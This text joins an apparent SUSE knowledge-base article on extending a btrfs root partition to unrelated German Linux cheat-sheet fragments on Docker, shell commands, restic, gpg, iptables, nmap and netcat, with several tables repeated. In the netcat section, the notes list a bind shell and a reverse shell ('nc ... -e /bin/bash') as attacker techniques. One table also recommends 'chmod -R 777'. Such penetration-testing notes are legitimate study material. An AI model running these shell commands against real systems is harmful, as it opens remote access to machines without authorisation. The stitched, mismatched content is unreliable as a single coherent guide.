### How to resize/extend a btrfs formatted root partition ### Environment

SUSE Linux Enterprise Server 11 Service Pack 4 (SLES 11 SP4) SUSE Linux Enterprise Server 12 (all Service Packs)

### Situation

The general procedure to resize a btrfs formatted file system can be found in the SLE 12 Storage Admin Guide. There are however additional points that have to be taken into consideration before executing the resize operation. 1. Is the original disk going to be expanded? 2. Is it possible to add a new disk to expand the existing btrfs file system? The following article will cover a situation with one disk and two partitions to show the steps necessary for both scenarios using both offline as well as online resize operation. Please keep in mind that a more sophisticated partitioning scheme (partitions behind the root volume or an extended partition layout) may cause problems. In these cases adding a new disk to expand the existing file system is the preferred solution. Please check the system setup carefully before carrying out any actions. **Because the procedures covered in this article contain a fair risk of losing the operating system while performing changes to the partition table, the administrator of the machine is required to create a backup before the operation! This guide does not claim to be complete or cover all possible scenarios. In case of questions please open a service request to discuss these with SUSE Technical Services before any action is taken.**

### Resolution

**Situation:** The disk space of a virtual system with 20GB hard disk should be increased to 40GB. **Preparation:**1. Since the following procedure requires changes to the partition table, a loss of data is possible. Please ensure to create a backup of the system before performing any action! 2. Ensure your restore procedure works correctly! 3. Check carefully if a MSDOS or GPT partition table was created. This information can easily be obtained from the parted -l / fdisk -l output easily.

**Note**: Only parted is able to edit GPT partition table. If a GPT partition table is used, an online resize is not possible as parted uses the BLKRRPART ioctl which prevents changes while the partition is mounted.

This article is going to cover the following three approaches to accomplish the resize of a virtual disk in a VMware based environment: 1. [Expanding the file system by adding a new disk](https://www.suse.com/support/kb/doc/?id=000018798#Expanding-the-file-system-by-adding-a-new-disk) 2. [Resizing the disk using parted](https://www.suse.com/support/kb/doc/?id=000018798#Resizing-using-parted) 3. [Resizing the disk online using fdisk](https://www.suse.com/support/kb/doc/?id=000018798#with-fdisk) **Expanding the file system by adding a new disk** A convenient and quick solution to add disk space to an existing btrfs file system is by adding a new disk. The procedure consists of four steps and the system does not need to be rebooted: 1. add a new disk 2. rescan the SCSI bus using

``` rescan-scsi-bus.sh -a ```

3. Add the newly added device to the root btrfs filesystem

``` btrfs device add /dev/sdX / ```

4. At this point the metadata is only stored on the first disk, to distribute (balance) it across the devices run:

``` btrfs filesystem balance / ```

**Resizing the disk using parted**

``` server1:~ # parted -l Model: VMware Virtual disk (scsi) Disk /dev/sda: 21.5GB Sector size (logical/physical): 512B/512B Partition Table: msdos Disk Flags: Number Start End Size Type File system Flags 1 1049kB 4302MB 4301MB primary linux-swap(v1) type=82 2 4302MB 21.5GB 17.2GB primary btrfs boot, type=83 ```

As a first step, the virtual disk needs to be increased on the hypervisor side. Please refer to the vendor documentation for this particular task. The parted -l output above also provides the information whether a MSDOS or GPT partition label was used. fdisk -l (an example is provided in the section [**Resizing the partition online using fdisk**](https://www.suse.com/support/kb/doc/?id=000018798#with-fdisk) ) will show this information. Once this has been accomplished, rescan the local disk:

``` server1:~ # echo 1 > /sys/block/sda/device/rescan server1:~ # parted -l Model: VMware Virtual disk (scsi) Disk /dev/sda: 42.9GB Sector size (logical/physical): 512B/512B Partition Table: msdos Disk Flags: Number Start End Size Type File system Flags 1 1049kB 4302MB 4301MB primary linux-swap(v1) type=82 2 4302MB 21.5GB 17.2GB primary btrfs boot, type=83 ```

The OS now sees the new size of the disk but the partitioning layout needs to be changed to add the remaining 20GB to /dev/sda2. Trying to resize /dev/sda using parted will fail with:

``` server1:~ # parted /dev/sda GNU Parted 3.1 Using /dev/sda Welcome to GNU Parted! Type 'help' to view a list of commands. (parted) resize Partition number? 2 Error: Partition /dev/sda2 is being used. You must unmount it before you modify it with Parted. (parted) ```

Trying to accomplish the same task in yast2 disk fails with:

``` Warning The file system is currently mounted on /. You can try to unmount it now, continue without unmounting or cancel. Click Cancel unless you know exactly what you are doing. ```

Hence this task needs to be accomplished in the rescue system. Please boot from the Service Pack DVD matching the installed SLES version and select "Rescue System" from the main menu. As of SLE 12 SP2, the Rescue System option is located in the "More ..." menu. Once the rescue system has started, the disk resize operation may be performed as follows:

``` 0:rescue:~ # parted /dev/sda GNU Parted 3.1 Using /dev/sda Welcome to GNU Parted! Type 'help' to view a list of commands. (parted) resize Partition number? 2 End? [21.5GB]? 42.5GB (parted) quit Information: You may need to update /etc/fstab. ```

Running parted -l will show the new end of the partition:

``` 0:rescue:~ # parted -l Model: VMware Virtual disk (scsi) Disk /dev/sda: 42.9GB Sector size (logical/physical): 512B/512B Partition Table: msdos Disk Flags: Number Start End Size Type File system Flags 1 1049kB 4302MB 4301MB primary linux-swap(v1) type=82 2 4302MB 42.5GB 38.2GB primary btrfs boot, type=83 ```

The last steps are to mount the partition and resize the btrfs file system (example below). (If the btrfs file system resides on multiple devices, see the Additional Information section of this document, as well.)

``` 0:rescue:~ # mount /dev/sda2 /mnt 0:rescue:~ # btrfs filesystem resize max /mnt Resize '/mnt' of 'max' 0:rescue:~ # df -h Filesystem Size Used Avail Use% Mounted on /dev/loop0 29M 29M 0 100% /parts/mp_0000 /dev/loop1 14M 14M 0 100% /parts/mp_0001 devtmpfs 468M 0 468M 0% /dev /dev/loop2 42M 42M 0 100% /mounts/mp_0000 /dev/loop3 34M 34M 0 100% /mounts/mp_0001 /dev/loop4 4.2M 4.2M 0 100% /mounts/mp_0002 tmpfs 497M 0 497M 0% /dev/shm tmpfs 497M 7.2M 490M 2% /run tmpfs 497M 0 497M 0% /sys/fs/cgroup tmpfs 497M 0 497M 0% /tmp tmpfs 100M 0 100M 0% /run/user/0 /dev/sda2 36G 753M 33G 3% /mnt ```

Reboot the system back into operation. **Resizing the partition online using fdisk** fdisk does not support resizing a partition. In this case the existing root partition needs to be deleted and recreated using the same start block but selecting the new end block to assign all available disk space to the partition. As already mentioned before, fdisk cannot deal with GPT partition tables. Please check carefully which label was chosen and select the right tool for the resize operation. When recreating the partition please make sure to set the bootable flag again, otherwise the system will not boot. The procedure using fdisk is as follows: Print the current partition table, save it, expand the disk, have the kernel rescan the device and make sure it sees the new size:

``` server1:~ # fdisk -l Disk /dev/sda: 20 GiB, 21474836480 bytes, 41943040 sectors Units: sectors of 1 * 512 = 512 bytes Sector size (logical/physical): 512 bytes / 512 bytes I/O size (minimum/optimal): 512 bytes / 512 bytes Disklabel type: dos Disk identifier: 0x0004a8ed Device Boot Start End Sectors Size Id Type /dev/sda1 2048 8402943 8400896 4G 82 Linux swap / Solaris /dev/sda2 * 8402944 41943039 33540096 16G 83 Linux btrfs:~ # echo 1 > /sys/block/sda/device/rescan btrfs:~ # fdisk -l Disk /dev/sda: 40 GiB, 42949672960 bytes, 83886080 sectors Units: sectors of 1 * 512 = 512 bytes Sector size (logical/physical): 512 bytes / 512 bytes I/O size (minimum/optimal): 512 bytes / 512 bytes Disklabel type: dos Disk identifier: 0x0004a8ed Device Boot Start End Sectors Size Id Type /dev/sda1 2048 8402943 8400896 4G 82 Linux swap / Solaris /dev/sda2 * 8402944 41943039 33540096 16G 83 Linux server1:~ # ```

**Keep in mind, operations in fdisk are temporary until a write operation is issued. So at any point it is safe to exit fdisk using CTRL+c.** As a next step open fdisk and delete the root partition.

``` server1:~ # fdisk /dev/sda Welcome to fdisk (util-linux 2.28). Changes will remain in memory only, until you decide to write them. Be careful before using the write command. Command (m for help): d Partition number (1,2, default 2): 2 Partition 2 has been deleted. ```

Now recreate partition #2 as a primary partition with partition ID 83 (Linux partition)

``` Command (m for help): n Partition type p primary (1 primary, 0 extended, 3 free) e extended (container for logical partitions) Select (default p): p Partition number (2-4, default 2): First sector (8402944-83886079, default 8402944): Last sector, +sectors or +size{K,M,G,T,P} (8402944-83886079, default 83886079): Created a new partition 2 of type 'Linux' and of size 36 GiB. Command (m for help): t Partition number (1,2, default 2): 2 Partition type (type L to list all types): 83 Changed type of partition 'Linux' to 'Linux'. ```

As shown above, fdisk picked up the correct start and end block by itself. The next step is to enable the boot-flag:

``` Command (m for help): a Partition number (1,2, default 2): 2 The bootable flag on partition 2 is enabled now. ```

After the changes above, the new partition table will be as follows:

``` Command (m for help): p Disk /dev/sda: 40 GiB, 42949672960 bytes, 83886080 sectors Units: sectors of 1 * 512 = 512 bytes Sector size (logical/physical): 512 bytes / 512 bytes I/O size (minimum/optimal): 512 bytes / 512 bytes Disklabel type: dos Disk identifier: 0x0004a8ed Device Boot Start End Sectors Size Id Type /dev/sda1 2048 8402943 8400896 4G 82 Linux swap / Solaris /dev/sda2 * 8402944 83886079 75483136 36G 83 Linux ```

Now, while writing the changes to disk, the following messages will be shown:

``` Command (m for help): w The partition table has been altered. Calling ioctl() to re-read partition table. Re-reading the partition table failed.: Device or resource busy The kernel still uses the old table. The new table will be used at the next reboot or after you run partprobe(8) or kpartx(8). server1:~ # partprobe Error: Partition(s) 2 on /dev/sda have been written, but we have been unable to inform the kernel of the change, probably because it/they are in use. As a result, the old partition(s) will remain in use. You should reboot now before making further changes. Error: Can't have a partition outside the disk! ```

SLES 11 SP4 based systems need to be rebooted at this point as the kernel does not support re-reading the partition table using BLKPG\_DEL\_PARTITION and BLKPG\_RESIZE\_PARTITION ioctls. Once the system is back online please run:

``` btrfs filesystem resize max / ```

to expand the file system. (If the btrfs file system resides on multiple devices, see the Additional Information section of this document, as well.) SLE 12 based systems support the ioctls mentioned previously, this way it is possible to notify the kernel about the changed partition table as the system is online. Old partition table:

``` server1:~ # fdisk -l /dev/sda Disk /dev/sda: 20 GiB, 21474836480 bytes, 41943040 sectors Units: sectors of 1 * 512 = 512 bytes Sector size (logical/physical): 512 bytes / 512 bytes I/O size (minimum/optimal): 512 bytes / 512 bytes Disklabel type: dos Disk identifier: 0x000dd878 Device Boot Start End Sectors Size Id Type /dev/sda1 2048 8402943 8400896 4G 82 Linux swap / Solaris /dev/sda2 * 8402944 41943039 33540096 16G 83 Linux ```

Execute the actions as displayed above to remove and recreate the partition table, write the changes and receive the busy message from the kernel:

``` server1:~ # fdisk -l Disk /dev/sda: 50 GiB, 53687091200 bytes, 104857600 sectors Units: sectors of 1 * 512 = 512 bytes Sector size (logical/physical): 512 bytes / 512 bytes I/O size (minimum/optimal): 512 bytes / 512 bytes Disklabel type: dos Disk identifier: 0x000dd878 Device Boot Start End Sectors Size Id Type /dev/sda1 2048 8402943 8400896 4G 82 Linux swap / Solaris /dev/sda2 * 8402944 104857599 96454656 46G 83 Linux ```

So /dev/sda2 was resized from 20GB to 50GB, check the kernel's view on the partitions:

``` server1:~ # cat /proc/partitions major minor #blocks name 2 0 4 fd0 8 0 52428800 sda 8 1 4200448 sda1 8 2 16770048 sda2 11 0 1048575 sr0 ```

now update the kernel's view of /dev/sda2 using:

``` partx -u -n 2 /dev/sda ```

and check the partitions again:

``` server1:~ # cat /proc/partitions major minor #blocks name 2 0 4 fd0 8 0 52428800 sda 8 1 4200448 sda1 8 2 48227328 sda2 11 0 1048575 sr0 ```

Now resize the filesystem. (If the btrfs file system resides on multiple devices, see the Additional Information section of this document, as well.)

``` btrfs filesystem resize max / ```

Running:

``` btrfs filesystem usage / ```

will now show the new size of the filesystem. Using partx it would also be possible to delete any partitions that are not needed behind the root volume, expand the root volume, delete the kernel view on that partition (partx -d -n X /dev/sda), update the root partition (partx -u -n X /dev/sda) and then resize the filesystem.

### Additional Information

**Considerations when adding new devices into a btrfs file system** Another possible method to extend the disk space of a btrfs file system would be to add unused partitions from a disk. Please note that btrfs will treat these partitions (even if they come from the same device) as a separate physical volume and if later the file system should operate in RAID mode, chunks will be served from both partitions which is not desirable. In this case it is preferable to either add complete disks or delete unused partitions and resize the root volume where applicable. **If the btrfs file system resides on multiple devices** When a btrfs file system resides on mulitple devices, first determine the devid of resized partition, for example:

``` btrfs filesystem show / ```

That will list all partitions in use, and number them. Then, for example, if the partition in question is devid 2, the appropriate command is:

``` btrfs filesystem resize 2:max / ```

Befehl	Beschreibung
docker start $container	startet den jeweiligen Container
docker container ls	running containers
docker container ls -a	all containers

Befehl

Beschreibung

docker start $container

startet den jeweiligen Container

docker container ls

running containers

docker container ls -a

all containers

## Docker installieren: ``` curl -fsSL https://get.docker.com -o get-docker.sh sudo sh ./get-docker.sh ``` Falls kein curl installiert: `apt install curl` Wenn man nicht mit dem Nutzer Root arbeitet, sollte man den aktuellen Benutzer berechtigen: ``` sudo usermod -aG docker $USER ``` ## Mit Docker arbeiten - Laufende Container auflisten: `docker ps` - Alle Container auflisten (auch gestoppte): `docker ps -a` - Einen Container anhalten: `docker stop ` (den Namen findet man mit `docker ps heraus`) - Einen gestoppten Container endgültig löschen: `docker rm ` ## Einen simplen Webserver starten Der Container aus dem Image nginx fährt mit folgendem Befehl hoch: ``` docker run -p 80:80 nginx ``` Die eigene IP-Adresse erhält man mit `ip a` ## Arbeiten mit Docker-Compose Legt euch am besten einen eigenen Ordner für das Docker-Projekt an, um Ordnung zu halten. Die Datei docker-compose.yml enthält die Definition der Container. Bearbeitet wird die Datei mit: ``` nano docker-compose.yml ``` Die Inhalte findet ihr unten in diesem GitHub-Gist. Den Texteditor Nano beendet man mit: `Strg+X`, dann `Y` Die Compose-Zusammenstellung hochfahren: ``` docker-compose up -d ``` Will man die Container updaten, lädt man die neuen Images mit ``` docker-compose pull ``` ## Eine oder mehrere Docker-Compose-Dateien? Das ist definitiv Geschmachssache und hängt von der Umgebung ab. Wenn man mehr als ein Projekt (zum Beispiel einen Blog und ein Pihole) auf einem Server betreibt, sollte man für jedes einen Ordner anlegen und darin eine Docker-Compose-Datei ablegen. Die nützlichen Helfer wie Portainer und Watchtower kommen zusammen in eine weitere Datei. Dann kann man mit `docker compose down`gezielt Teile der Umgebung herunterfahren.

Befehl	Beispiel	Beschreibung
cat	`cat /etc/fstab`	Ausgabe von Text- und Konfigurationsdateien
chmod	`chmod -R 777 ~/Dokumente`	ändert die Berechtigungen einer Datei oder Ordner
	`chmod +x dateinahme`	macht eine Datei ausführbar
touch	`touch file1.md`	erstellt eine leere Datei
cp	`cp mein.pdf ~/Schreibtisch`	kopieren
mv	`mv datei.txt datei.old`	Benennt eine Datei um
	`mv /mnt/transfer/text.txt /ort/text.txt`	Datei verschieben
rm	`rm /home/sepp/*.jpg`	löscht alle jpg dateien in Sepp (löschen)
du	`du /home/sepp/bilder`	ermittelt den Speicherplatz eines Ordners
mkdir	`mkdir /home/sepp/dokumente`	Erstellt einen Ordner
rmdir	`rmdir /media/data/bilder`	löscht Ordner
find	`find / -name logs` `find / -name logs 2>/dev/null`	Findet Dateien mit dem namen Logs Durch die Erweiterung werden Fehlermeldungen die in Ausgabe 2 ausgegeben werden an /dev/null geschickt. Somit werden Fehlermeldungen nicht mehr angezeigt
	find . -user dan	Sucht alle Dateien die dem User dan gehören
	`find . -executable -type f`	Findet Dateien, die ausführbar sind
locate	`locate logs`	Ähnlich wie find
grep	`grep 500 access.log`	Um innerhalb von dateien zu suchen. In dem Beispiel werden in access.log die Einträge mit 500 angezeigt
	`grep -R password`	Suche im aktuellen Ordner mit allen unterordnern
less	`less log.txt`	Damit können Dateien durchsucht werden Wenn man in Less &404 eingibt werden nur Zeilen mit dme inhalt 404 angezeigt. Benenden mit !
man	`man grep`	Hilfe zu Befehlen
tree	`tree /home`	Alternative zu ls
rsync	`rsync -au /home/sepp/ /media/USB/Backup`	`kopiert, aktualisiert ("-u"), spiegelt ("--delete") verzeichnise rekursiv ("-a") im lokalen Dateisystem und Netzwerk (ähnlich wie robocopy)`
	`rsync -a -r --delete /home/sepp /mnt/paperless_backup`
	`rsync -au --delete --dry-run /home/sepp/ /media/sepp/USB/Backup`	-dry-run dient als Simulation und vorabtest
tar	`tar -czf 2022_02_12 /home/sepp/`	`komprimiert Ordner und Dateien. -c steht für create, -z für platzsparende gzip-Komprimierung, -f sorgt für rekursiven Umfang. Der Name des Archivs folgt nach den Schaltern, am Ende der Pfad der Quelldateien.`
	`tar -xf 2022-02-12`	schalter -x entpackt Tar-Archive
System
hostname		liefert Servername oder Computername des Systems
shutdown / reboot	`reboot now`	Fährt das system herunter oder Starte neu
	`shutdown 22:00`	Herunterfahren zu einem bestimmten Zeitpunkt
which	`which poweroff`	ermittelt den Systempfad eines Programms
whereis	`whereis python3`	liefert auch noch weitere zu Pfade zu Bibliotheken oder Manpages
service	service --status-all	informiert über aktive und inaktive systemdienste und bietet deren Steuerung an.
	service docker status	Für den Dienst bestimmte Aktionen (auch stop, restart)
systemd-analyze		Es protokolliert detailliert den Bootprozess und kann die Ursache von Bootverzögerungen entlarven.
`python3 -m http.server 4444`		`Python Server zum bereitstellen von dateien im aktuellen Ornder`
passwd		Passwort ändern
lsblk		Festplatten anzeigen lassen
ls		zeigt den Inhalt des aktuellen Verzeichnisses an
ls -a		zeigt alle Inhalte an, auch die versteckten (beginnen mit einem Punkt)
ls -l		zeigt den Inhalt des Verzeichnisses im Detail mit Zusatzinformationen an
ls -la		kombiniert die Optionen -l und -a
ls bin		zeigt das Unterverzeichnis bin oder eine Datei namens bin im aktuellen Verzeichnis an
pwd		zeigt das aktuelle Verzeichnis an
cd /etc		wechselt in das Verzeichnis /etc
cd ../bin		wechselt eine ebene höher und von dort in das Unterverzeichnis bin
cd -		wechselt in das vorhergehende Verzeichnis
cd		wechselt in das Homeverzeichnis des aktuellen Benutzers
mkdir bin		erstellt ein Unterverzeichnis bin
nano [HelloWorld.py](http://helloworld.py/)		ruft den Editor nano mit der angegebenen Datei auf (wird ggf. erstellt)
cat [HelloWorld.py](http://helloworld.py/)		zeigt die (Text-)Datei [HelloWorld.py](http://helloworld.py/) an
mv [HelloWorld.py](http://helloworld.py/) [helloworld.py](http://helloworld.py/)		benennt die Datei von [HelloWorld.py](http://helloworld.py/) in [helloworld.py](http://helloworld.py/) um
mv [helloworld.py](http://helloworld.py/) ../		verschiebt die angegebene Datei in das übergeordnete Verzeichnis
cp [helloworld.py](http://helloworld.py/) bin/HelloWorld.py		kopiert die angegebene Datei an die angegebene Stelle
rm [helloworld.py](http://helloworld.py/)		löscht die angegebene Datei
which python		zeigt den Pfad zum angegebenen Programm
python3 [HelloWorld.py](http://helloworld.py/)		ruft [HelloWorld.py](http://helloworld.py/) mit dem Python3-Interpreter auf
chmod +x [HelloWorld.py](http://helloworld.py/)		ergänzt das Ausführen-Recht für alle Benutzer für die angegebene Datei
echo $PATH		zeigt den Inhalt der Variablen PATH an
PATH='/root/bin':$PATH		fügt der Variablen PATH vorn /root/bin an
apt-get install kate		installiert das Paket kate

Befehl

Beispiel

Beschreibung

cat

`cat /etc/fstab`

Ausgabe von Text- und Konfigurationsdateien

chmod

`chmod -R 777 ~/Dokumente`

ändert die Berechtigungen einer Datei oder Ordner

`chmod +x dateinahme`

macht eine Datei ausführbar

touch

`touch file1.md`

erstellt eine leere Datei

`cp mein.pdf ~/Schreibtisch`

kopieren

`mv datei.txt datei.old`

Benennt eine Datei um

`mv /mnt/transfer/text.txt /ort/text.txt`

Datei verschieben

`rm /home/sepp/*.jpg`

löscht alle jpg dateien in Sepp (löschen)

`du /home/sepp/bilder`

ermittelt den Speicherplatz eines Ordners

mkdir

`mkdir /home/sepp/dokumente`

Erstellt einen Ordner

rmdir

`rmdir /media/data/bilder`

löscht Ordner

find

`find / -name logs` `find / -name logs 2>/dev/null`

Findet Dateien mit dem namen Logs Durch die Erweiterung werden Fehlermeldungen die in Ausgabe 2 ausgegeben werden an /dev/null geschickt. Somit werden Fehlermeldungen nicht mehr angezeigt

find . -user dan

Sucht alle Dateien die dem User dan gehören

`find . -executable -type f`

Findet Dateien, die ausführbar sind

locate

`locate logs`

Ähnlich wie find

grep

`grep 500 access.log`

Um innerhalb von dateien zu suchen. In dem Beispiel werden in access.log die Einträge mit 500 angezeigt

`grep -R password`

Suche im aktuellen Ordner mit allen unterordnern

less

`less log.txt`

Damit können Dateien durchsucht werden Wenn man in Less &404 eingibt werden nur Zeilen mit dme inhalt 404 angezeigt. Benenden mit !

man

`man grep`

Hilfe zu Befehlen

tree

`tree /home`

Alternative zu ls

rsync

`rsync -au /home/sepp/ /media/USB/Backup`

`kopiert, aktualisiert ("-u"), spiegelt ("--delete") verzeichnise rekursiv ("-a") im lokalen Dateisystem und Netzwerk (ähnlich wie robocopy)`

`rsync -a -r --delete /home/sepp /mnt/paperless_backup`

`rsync -au --delete --dry-run /home/sepp/ /media/sepp/USB/Backup`

-dry-run dient als Simulation und vorabtest

tar

`tar -czf 2022_02_12 /home/sepp/`

`komprimiert Ordner und Dateien. -c steht für create, -z für platzsparende gzip-Komprimierung, -f sorgt für rekursiven Umfang. Der Name des Archivs folgt nach den Schaltern, am Ende der Pfad der Quelldateien.`

`tar -xf 2022-02-12`

schalter -x entpackt Tar-Archive

*System*

hostname

liefert Servername oder Computername des Systems

shutdown / reboot

`reboot now`

Fährt das system herunter oder Starte neu

`shutdown 22:00`

Herunterfahren zu einem bestimmten Zeitpunkt

which

`which poweroff`

ermittelt den Systempfad eines Programms

whereis

`whereis python3`

liefert auch noch weitere zu Pfade zu Bibliotheken oder Manpages

service

service --status-all

informiert über aktive und inaktive systemdienste und bietet deren Steuerung an.

service docker status

Für den Dienst bestimmte Aktionen (auch stop, restart)

systemd-analyze

Es protokolliert detailliert den Bootprozess und kann die Ursache von Bootverzögerungen entlarven.

`python3 -m http.server 4444`

`Python Server zum bereitstellen von dateien im aktuellen Ornder`

passwd

Passwort ändern

lsblk

Festplatten anzeigen lassen

zeigt den Inhalt des aktuellen Verzeichnisses an

ls -a

zeigt alle Inhalte an, auch die versteckten (beginnen mit einem Punkt)

ls -l

zeigt den Inhalt des Verzeichnisses im Detail mit Zusatzinformationen an

ls -la

kombiniert die Optionen -l und -a

ls bin

zeigt das Unterverzeichnis bin oder eine Datei namens bin im aktuellen Verzeichnis an

pwd

zeigt das aktuelle Verzeichnis an

cd /etc

wechselt in das Verzeichnis /etc

cd ../bin

wechselt eine ebene höher und von dort in das Unterverzeichnis bin

cd -

wechselt in das vorhergehende Verzeichnis

wechselt in das Homeverzeichnis des aktuellen Benutzers

mkdir bin

erstellt ein Unterverzeichnis bin

nano [HelloWorld.py](http://helloworld.py/)

ruft den Editor nano mit der angegebenen Datei auf (wird ggf. erstellt)

cat [HelloWorld.py](http://helloworld.py/)

zeigt die (Text-)Datei [HelloWorld.py](http://helloworld.py/) an

mv [HelloWorld.py](http://helloworld.py/) [helloworld.py](http://helloworld.py/)

benennt die Datei von [HelloWorld.py](http://helloworld.py/) in [helloworld.py](http://helloworld.py/) um

mv [helloworld.py](http://helloworld.py/) ../

verschiebt die angegebene Datei in das übergeordnete Verzeichnis

cp [helloworld.py](http://helloworld.py/) bin/HelloWorld.py

kopiert die angegebene Datei an die angegebene Stelle

rm [helloworld.py](http://helloworld.py/)

löscht die angegebene Datei

which python

zeigt den Pfad zum angegebenen Programm

python3 [HelloWorld.py](http://helloworld.py/)

ruft [HelloWorld.py](http://helloworld.py/) mit dem Python3-Interpreter auf

chmod +x [HelloWorld.py](http://helloworld.py/)

ergänzt das Ausführen-Recht für alle Benutzer für die angegebene Datei

echo $PATH

zeigt den Inhalt der Variablen PATH an

PATH='/root/bin':$PATH

fügt der Variablen PATH vorn /root/bin an

apt-get install kate

installiert das Paket kate

Eigenschaft	Beschreibung
Verschlüsselung	Alle Backups werden automatisch mit AES-256 verschlüsselt
Deduplizierung	Gleiche Daten werden nur einmal gespeichert – spart Speicherplatz
Inkrementell	Nur geänderte Dateien werden gesichert – sehr schnell
Viele Ziele	Lokal, externe Festplatte, Nextcloud (WebDAV), S3, SFTP, u.v.m.
Open Source	Kostenlos, transparent, aktiv weiterentwickelt
Cross-Platform	Backup auf Linux erstellen, auf Windows wiederherstellen

Eigenschaft

Beschreibung

**Verschlüsselung**

Alle Backups werden automatisch mit AES-256 verschlüsselt

**Deduplizierung**

Gleiche Daten werden nur einmal gespeichert – spart Speicherplatz

**Inkrementell**

Nur geänderte Dateien werden gesichert – sehr schnell

**Viele Ziele**

Lokal, externe Festplatte, Nextcloud (WebDAV), S3, SFTP, u.v.m.

**Open Source**

Kostenlos, transparent, aktiv weiterentwickelt

**Cross-Platform**

Backup auf Linux erstellen, auf Windows wiederherstellen

Befehl	Beschreibung
`restic init --repo /pfad`	Repository initialisieren
`restic backup --repo /pfad /home/user`	Backup erstellen
`restic snapshots --repo /pfad`	Alle Snapshots anzeigen
`restic restore latest --repo /pfad --target /ziel`	Letztes Backup wiederherstellen
`restic restore ID --repo /pfad --target /ziel`	Bestimmten Snapshot wiederherstellen
`restic ls --repo /pfad latest`	Inhalt des letzten Backups anzeigen
`restic mount --repo /pfad /mnt/punkt`	Backup als Dateisystem einhängen
`restic forget --keep-daily 7 --prune`	Alte Backups löschen
`restic check --repo /pfad`	Backup-Integrität prüfen
`restic self-update`	Restic auf neueste Version aktualisieren

Befehl

Beschreibung

`restic init --repo /pfad`

Repository initialisieren

`restic backup --repo /pfad /home/user`

Backup erstellen

`restic snapshots --repo /pfad`

Alle Snapshots anzeigen

`restic restore latest --repo /pfad --target /ziel`

Letztes Backup wiederherstellen

`restic restore ID --repo /pfad --target /ziel`

Bestimmten Snapshot wiederherstellen

`restic ls --repo /pfad latest`

Inhalt des letzten Backups anzeigen

`restic mount --repo /pfad /mnt/punkt`

Backup als Dateisystem einhängen

`restic forget --keep-daily 7 --prune`

Alte Backups löschen

`restic check --repo /pfad`

Backup-Integrität prüfen

`restic self-update`

Restic auf neueste Version aktualisieren

conv=noerror	Diese Option weist dd an, beim Auftreten eines Lese oder Schreibfehlers nicht abzubrechen.
sync	diese OPtion sorgt dafür, dass dd beim Auftreten eines Fehlers "leere" Blöcke anstelle der fehlerhaften Blöcke in die Ausgabedatei schreibt

Befehl	Auswirkung
`lsblk`	Übersichtliche Baumstrucktur aller Festplatten und Partitionen
`df -h`	Freien Speicherplatz anzeigen lassen
`sudo lvextend -l 100%VG ubuntu-vg/ubuntu-lv`	Weist den Speicherplatz der Partition zu Wenn sda3 30G - ubuntu--vg-ubuntu-vl 15G Danch sind die vollen 30G Ubuntu zugewiesen [und weiter](#bkmrk-ubuntu-server-part-e)

Befehl	Kommentar
`gpg -e -r <Empfänger-Schlüssel-ID> <Datei>`	Datei verschlüsseln
`gpg -d <verschlüsselte-Datei.gpg> > entschlüsselte-Datei`	Datei entschlüsseln
`gpg --import private-key.asc`	Schlüssel importieren
`gpg --delete-key`	Gefolgt vom Namen oder Fingerabdruck

Befehl	Kommentar
gpg -k	Liste der Schlüssel

Code	Kommentar
`$(date +%A)`	ruft die Systemvariable ab, die den aktuellen Wochentag speichert

`mkdir /home/kali/bin`	Den Bin Ordner in Home erstellen
`nano script.sh`	Skript erstenn
`chmod +x script.sh`	Skripte ausführbar machen
`mv`	move oder umbenennen
`cp `	kopieren
`grep "kali" /etc/passwd`	Datei untersuchen
`ip a`	ip-Adresse anzeigen
`netstat -nr `	Routing-Tabelle anzeigen
`netstat -tlpn`	Zeigt an welche ports offen sind Offene Ports

sudo netdiscover	Private Netzwerke scannen
sudo netdiscover -r 10.10.1.0/24	Zum scannen eines bestimmten Bereichs

icmp	icmp
icmp and host 10.10.30.13
scr host 192.168.1.254 and tcp port 80	beschränkt auf source host und port 80

tcp.port == 443
ip.addr == 192.168.1.1
not arp and not tls
tcp.flags.reset == set
ip.src == 192.168.1.1 and dns.qry.name == "consent.google.com"

nmap -sn 10.10.0.0/27	Ping-Scan
nmap 10.10.0.0/27	Normaler nmap scan
nmap -sS 10.10.1.10	Half open scan benötigt Root
nmap -sU 10.10.1.10 -p 53	UDP Scan auf port 53
nmap 10.10.1.10 --top-ports 15	Scannt die 15 häufigsten ports
Version und OS Detection
nmap -sV 10.10.1.10	V ist die Versionserkennung
nmap -O 10.10.1.10 -v	OS Detection
nmap -A 10.10.1.10 -v	-A ist die Rundumglückich option
NSE	Nmap Skript Engine
	/usr/share/nmap/scripts
nmap --script-help http-config-backup	Hilfe zum Skript
-oN / -oG filename.txt	Ausgabe in einer datei in einem Bestimmten Format
nmap -A -oG ausgabe.nmap 10.10.1.10

`nc -v -z 192.168.1.254 80`	Portscan auf port 80
`nc -lnvp 4444`	Listening Port auf Port 4444 eröffnen
`nc 172.16.1.133 4444`	Zu dem Server mit Listening verbindung aufbauen
`nc -nlvp 4444 > incoming.txt`	Eingang in eine Datei umleiten
`nc -nlvp 4444 > wget`	Dateien übertragen (empfang)
`nc 10.10.0.5 4444 < /usr/share/windows-resources/binaries/wget.exe`	Datei senden
tcpdump host 10.10.0.5	Anzeigen von datenübertragungen
nc -nlvp 4444 -e /bin/bash	Die bash an den Port binden. Somit hat man eine Bind schell erstellt
Reverse Shell
nc -nlvp 443	Beim Angreifer einen Listener erstellen
nc 10.10.0.4 443 -e /bin/bash	Baut eine Shell beim angreifer auf (windows -e cmd.exe)

`iptables -A INPUT -p icmp -j DROP`	Hängt mit -A eine neue Regel an. -p gibt das Protokoll wieder. und DROP sagt das die Verbindung unterbunden werden soll
`iptables -A INPUT -s 192.168.1.150 -p tcp --dprot 22 -j DROP`	-s = Source \--dport = Destination Port
`iptables -I INPUT -p tcp --dport 80 DROP`	Hängt die Regel vorne dran (Regeln die vorne sind, werden als erstes bearbeitet. Spezifische Regeln müssen immer weiter oben stehen)
`iptables -D INPUT 5`	Löscht die 5. Regel
`iptables -I INPUT 2 -p tcp --dport 22 -j ACCEPT`	Input auf Position 2

uname	Print system Informationen
lscpu	display information about the cpu

/	Root-Verzeichnis	Unterste Verzeichnisebene
/bin		Grundlegende Systembefehle
/sbin		Systembefehle die nur Root-User auführen können.
/boot		Dateien die beim Booten benötigt werden
/dev		Geräte dateien
/etc		Konfigurationsverzeichnis (Sämtliche dateien zum konfigurieren befinden sich normal hier)
/home		Alle Benutzerverzeichnisse
/lib		Dynamische Bibliotheken die für Programme die unter bin oder sbin verwendet werden benötigt werden Kernel Module
/lib64		für 64 bit systeme
/media		Wechseldatenträger werden hier gemountet
/mnt		Mountpoint für weitere Geräte
/opt		Optionale Pakete
